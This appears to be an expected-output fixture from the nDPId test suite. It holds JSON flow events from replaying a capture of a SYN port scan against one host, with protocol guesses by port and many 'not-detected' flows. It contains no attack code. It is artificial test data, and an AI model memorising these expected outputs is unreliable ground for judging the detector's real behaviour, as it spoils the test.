-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 